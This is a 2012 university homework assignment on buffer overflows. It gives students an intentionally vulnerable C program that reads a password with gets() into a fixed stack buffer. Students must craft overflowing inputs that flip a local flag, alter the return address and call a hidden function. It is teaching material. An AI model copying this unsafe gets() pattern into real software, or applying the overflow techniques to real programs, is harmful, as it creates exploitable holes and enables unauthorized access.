CSE 334/434: Software System Security, Fall 2012


Experiencing Buffer Overflows

Part 1 (1 points)

Search the web and fill in the blanks below.

"If you were to use a buffer overflow attack to knowingly gain unauthorized access or to cause damage to other people's computers, the Computer Fraud and Abuse Act provides a maximum penalty of ____ years in prison for a first offense. It was amended by USA PATRIOT Act later to provide a maximum penalty of ____ years for a first offense."

Part 2

Read the document Smashing The Stack For Fun And Profit by Aleph One.

Part 3 and part 4 are required for all students. Part 5 is required for CSE 434 students. Part 6 is a bonus question for 434 students. You must do Part 3 to 5 on the server edgar.cse.lehigh.edu and compile the program using gcc; the result depends on the exact compiler and operating system you use. The edgar server is an Intel machine with a Linux operating system.

Part 3 (3 points)

We have the following program lucky.c that generates lucky numbers. It takes a password as input, but always refuses to generate a lucky number. Luckily, the program is vulnerable to a buffer overrun in the goodPassword() procedure. The goal is to take advantage of the vulnerability so that it can generate lucky numbers for us.

#include <stdio.h>
#include <sys/time.h>
#include <stdlib.h>

int *ret;

char goodPassword() {
  int good='N';
  char Password[100]; // Memory storage for the password
  gets(Password); // Get input from keyboard

  return (char)good;
}

int main() {
  struct timeval t;

  printf("Enter your password:");

  if (goodPassword() == 'Y') {
    gettimeofday(&t, 0);
    srand((unsigned int) t.tv_usec);
    printf("Your lucky number today is %d!\n", rand()%100);
  }
  else {
    printf("No lucky numbers for you today.\n");
    exit(-1);
  }

  return 0;
}
For Part 3, figure out a password that can make the program output a lucky number. Explain how your password works. Hint: no need to overwrite the return address for Part 3; there is another easy target to overwrite in this program.

Compile the above program using "gcc lucky.c -o lucky" and verify your password works on the generated executable; ignore the warning about gets from gcc.

Part 4 (3 points)

Suppose you are allowed to add some code between "gets(Password);" and "return (char)good;" in the goodPassword() procedure. We intend to use the following code template to modify the return address on the stack so that the program jumps directly to the THEN branch without checking the result of goodPassword():
ret=(int *) ((int) Password+?);
*ret = *ret + ?;
Each ? above represents an integer constant. Figure out these constants. You'd need the help of gdb to figure out the offset between the Password buffer and the return address on the stack. On-paper calculation probably won't work, as the stack layout depends on the compiler.

Part 5 (3 points)

We modify the original program to add a secret function, as shown below.

#include <stdio.h>
#include <sys/time.h>
#include <stdlib.h>

int *ret;

char goodPassword() {
  int good='N';
  char Password[100]; // Memory storage for the password
  gets(Password); // Get input from keyboard

  return (char)good;
}

void secret (char ch) {
  printf("\nThis is the secret character: %c\n", ch);
}

int main() {
  struct timeval t;

  printf("Enter your password:");

  if (goodPassword() == 'Y') {
    gettimeofday(&t, 0);
    srand((unsigned int) t.tv_usec);
    printf("Your lucky number today is %d!\n", rand()%100);
  }
  else {
    printf("No lucky number for you today.\n");
    exit(-1);
  }

  return 0;
}
Now figure out a password that makes the program to call the secret function.

Notes:

Bonus question (2 points)

Continue part 5. Suppose now we'd like the output message to be "This is the secret character: C". That is, the output character should be "C". Can you figure out a password to do this? Hint: you should put the character at the place of the stack where the secret function expects its parameter.

Tools you may need

What you need to submit

Submit your work through CourseSite. The deadline is Sept 14th, 6pm. The submission should be a text file that contains the answers to the required parts and also explanation how your answers work to achieve the desired results.


Author: Gang Tan, Lehigh University, 2012. All rights reserved.